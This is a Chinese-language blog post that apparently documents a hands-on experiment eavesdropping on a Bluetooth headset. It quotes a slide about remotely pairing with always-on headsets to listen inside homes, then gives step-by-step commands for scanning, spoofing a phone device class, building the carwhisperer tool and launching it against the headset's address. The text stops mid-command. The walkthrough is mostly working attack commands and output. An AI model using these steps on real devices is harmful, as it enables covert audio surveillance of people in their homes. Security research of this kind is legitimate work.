窃听蓝牙耳机小实验

mramydnei | 2015-10-19 22:41

上周看了下Hirsch-Bluetooth-Device-Security-2015感觉里面的这段挺好玩的。

Scenarios (5)
Example #4: all Bluetooth speakers or headsets that
are auto-discoverable with HSP (headset) service
(most have this)
●
Eve walks down street listening for auto-
discoverable HSP devices (these are common!)
●
Eve notes that many well-to-do neighborhoods
have lots of these HSP devices left on 24/7, and
that Eve can pair remotely without local
confirmation, and listen to everything in the home
the microphone can pick up.

于是乎从网上买了个蓝牙耳机打算实验一下。

产品名：ELECOM HS10

支持的协议：HFP/HSP

通信方式：蓝牙3.0

然后开始RTFM。发现默认PIN是0000，长按操作按钮5s后会进入到匹配模式。按照说明书长按5s进入到匹配模式后，开始借助pc扫描蓝牙设备

root@kali:~# hcitool scan
Scanning ...
28:52:E0:XX:XX:XX HS10

获取到蓝牙地址后，更改device class假装自己是一台手机：

service bluetooth restart
hciconfig hci0 up
hciconfig hci0 class 0x500204

确认更改生效

root@kali:~/carwhisperer-0.2# hciconfig -a
hci0: Type: BR/EDR Bus: USB
BD Address: A8:86:DD:XX:XX:XX ACL MTU: 1021:8 SCO MTU: 64:1
UP RUNNING
RX bytes:508634 acl:119 sco:9598 events:755 errors:0
TX bytes:212355 acl:132 sco:9486 commands:371 errors:0
Features: 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy: RSWITCH SNIFF
Link mode: SLAVE ACCEPT
Name: 'kali'
Class: 0x500204
Service Classes: Object Transfer, Telephony
Device Class: Phone, Cellular
HCI Version: 4.0 (0x6) Revision: 0x22fc
LMP Version: 4.0 (0x6) Subversion: 0x416a
Manufacturer: Broadcom Corporation (15)

从此处下载carwhisperer-0.2并解压。

http://trifinite.org/Downloads/carwhisperer-0.2.tar.gz

make一下，然后修改makefile的两个坑，把cw_pin.sh替换成cw_pin.pl保存退出后make install一下

来完成安装。随后借助我们之前获取的蓝牙地址开始窃听目标耳机：

root@kali:~/carwhisperer-0.2# carwhisperer hci0 message.raw justatest00.raw...